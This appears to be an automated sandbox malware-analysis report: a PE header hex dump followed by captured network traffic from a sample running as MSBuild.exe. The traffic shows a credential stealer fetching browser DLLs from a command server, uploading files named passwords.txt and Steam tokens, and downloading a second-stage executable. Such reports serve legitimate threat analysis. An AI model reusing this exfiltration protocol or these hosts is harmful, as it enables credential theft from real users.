06 00 00 00 00 00 52 6f 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 1e f2 08 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 c6 02 00 28 00 00 00 00 80 08 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 08 00 d4 1a 00 00 c0 ab 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ab 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f0 10 02 00 00 10 00 00 00 12 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 
9d 00 00 00 30 02 00 00 9e 00 00 00 16 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 a3 05 00 00 d0 02 00 00 96 05 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d8 03 00 00 00 80 08 00 00 04 00 00 00 4a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 1a 00 00 00 90 08 00 00 1c 00 00 00 4e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: GET /maslengdsa HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGIDHJKKJDGCBGCGIJKHost: kasm.zubairgul.comContent-Length: 255Connection: Keep-AliveCache-Control: no-cacheData Raw: [hex dump omitted; decoded below] Data Ascii: ------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="hwid"1F00F5D65CE1650445529-a33c7340-61ca------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------KEGIDHJKKJDGCBGCGIJK--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDHJKFIECAAKFIJJKJHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: [hex dump omitted; decoded below] Data Ascii: ------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="token"85fe22c0efb4e219cfb9e8611f4ffaaa------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="mode"1------EHJDHJKFIECAAKFIJJKJ--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKKJEBFIDAEBFHIDAEBHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: [hex dump omitted; decoded below] Data Ascii: ------FBKKJEBFIDAEBFHIDAEBContent-Disposition: form-data; name="token"85fe22c0efb4e219cfb9e8611f4ffaaa------FBKKJEBFIDAEBFHIDAEBContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------FBKKJEBFIDAEBFHIDAEBContent-Disposition: form-data; name="mode"2------FBKKJEBFIDAEBFHIDAEB--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFBHost: kasm.zubairgul.comContent-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: [hex dump omitted; decoded below] Data Ascii: ------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="token"85fe22c0efb4e219cfb9e8611f4ffaaa------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="mode"21------DAKEBAKFHCFHIEBFBAFB--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDHJKFIECAAKFIJJKJHost: kasm.zubairgul.comContent-Length: 5965Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sql.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDGCGIEGDGDGDGHJKKHost: kasm.zubairgul.comContent-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDGCGIEGDGDGDGHJKKHost: kasm.zubairgul.comContent-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCFHost: kasm.zubairgul.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: [hex dump omitted; decoded below] Data Ascii: ------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="token"85fe22c0efb4e219cfb9e8611f4ffaaa------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="file_data"------CAAKKFHCFIECAAAKEGCF--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEHost: kasm.zubairgul.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: [hex dump omitted; decoded below] Data Ascii: ------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="token"85fe22c0efb4e219cfb9e8611f4ffaaa------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="file_data"------EGIDAAFIEHIEHJKFHCAE--
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEHost: kasm.zubairgul.comContent-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBAFCFIJJJECBGIIJKHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 66 65 32 32 63 30 65 66 62 34 65 32 31 39 63 66 62 39 65 38 36 31 31 66 34 66 66 61 61 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 2d 2d 0d 0a Data Ascii: ------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="token"85fe22c0efb4e219cfb9e8611f4ffaaa------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="mode"3------EGCBAFCFIJJJECBGIIJK--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFHCGIJECFHIDGDBKEHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 66 65 32 32 63 30 65 66 62 34 65 32 31 39 63 66 62 39 65 38 36 31 31 66 34 66 66 61 61 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 2d 2d 0d 0a Data Ascii: ------JDAFHCGIJECFHIDGDBKEContent-Disposition: form-data; name="token"85fe22c0efb4e219cfb9e8611f4ffaaa------JDAFHCGIJECFHIDGDBKEContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------JDAFHCGIJECFHIDGDBKEContent-Disposition: form-data; name="mode"4------JDAFHCGIJECFHIDGDBKE--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJKJDBFIIDHJKEHJEHHost: kasm.zubairgul.comContent-Length: 461Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4b 4a 44 42 46 49 49 44 48 4a 4b 45 48 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 66 65 32 32 63 30 65 66 62 34 65 32 31 39 63 66 62 39 65 38 36 31 31 66 34 66 66 61 61 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4b 4a 44 42 46 49 49 44 48 4a 4b 45 48 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4b 4a 44 42 46 49 49 44 48 4a 4b 45 48 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4b 4a 44 42 46 49 49 44 48 4a 4b 45 48 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 70 59 30 31 35 77 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4b 4a 44 42 46 49 49 44 48 4a 4b 45 48 4a 45 48 2d 2d 0d 0a Data Ascii: ------CBKJKJDBFIIDHJKEHJEHContent-Disposition: form-data; name="token"85fe22c0efb4e219cfb9e8611f4ffaaa------CBKJKJDBFIIDHJKEHJEHContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------CBKJKJDBFIIDHJKEHJEHContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------CBKJKJDBFIIDHJKEHJEHContent-Disposition: form-data; name="file_data"pY015w==------CBKJKJDBFIIDHJKEHJEH--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEHost: kasm.zubairgul.comContent-Length: 113593Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGIDHJKKJDGCBGCGIJKHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 66 65 32 32 63 30 65 66 62 34 65 32 31 39 63 66 62 39 65 38 36 31 31 66 34 66 66 61 61 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 2d 2d 0d 0a Data Ascii: ------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="token"85fe22c0efb4e219cfb9e8611f4ffaaa------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="mode"5------KEGIDHJKKJDGCBGCGIJK--
Source: global traffic HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1Host: nsdm.cumpar-auto-orice-tip.roCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKKJEBFIDAEBFHIDAEBHost: kasm.zubairgul.comContent-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 4b 4a 45 42 46 49 44 41 45 42 46 48 49 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 66 65 32 32 63 30 65 66 62 34 65 32 31 39 63 66 62 39 65 38 36 31 31 66 34 66 66 61 61 61 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4b 4a 45 42 46 49 44 41 45 42 46 48 49 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4b 4a 45 42 46 49 44 41 45 42 46 48 49 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4b 4a 45 42 46 49 44 41 45 42 46 48 49 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 32 38 35 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4b 4a 45 42 46 49 44 41 45 42 46 48 49 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4b 4a 45 42 46 49 44 41 45 42 46 48 49 44 41 45 42 2d 2d 0d 0a Data Ascii: ------FBKKJEBFIDAEBFHIDAEBContent-Disposition: form-data; name="token"85fe22c0efb4e219cfb9e8611f4ffaaa------FBKKJEBFIDAEBFHIDAEBContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------FBKKJEBFIDAEBFHIDAEBContent-Disposition: form-data; name="mode"51------FBKKJEBFIDAEBFHIDAEBContent-Disposition: form-data; name="task_id"1285492------FBKKJEBFIDAEBFHIDAEBContent-Disposition: form-data; name="status"1------FBKKJEBFIDAEBFHIDAEB--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKECAFIDAFIECBKEHDHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 66 65 32 32 63 30 65 66 62 34 65 32 31 39 63 66 62 39 65 38 36 31 31 66 34 66 66 61 61 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 2d 2d 0d 0a Data Ascii: ------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="token"85fe22c0efb4e219cfb9e8611f4ffaaa------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="mode"6------JEBKECAFIDAFIECBKEHD--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFBHost: cowod.hopto.orgContent-Length: 5765Connection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox View IP Address: 95.164.90.97 95.164.90.97
Source: Joe Sandbox View ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Joe Sandbox View ASN Name: VAKPoltavaUkraineUA VAKPoltavaUkraineUA
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:51294 -> 147.45.44.104:80
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 1_2_00406963
Source: global traffic HTTP traffic detected: GET /maslengdsa HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sql.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1Host: nsdm.cumpar-auto-orice-tip.roCache-Control: no-cache
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
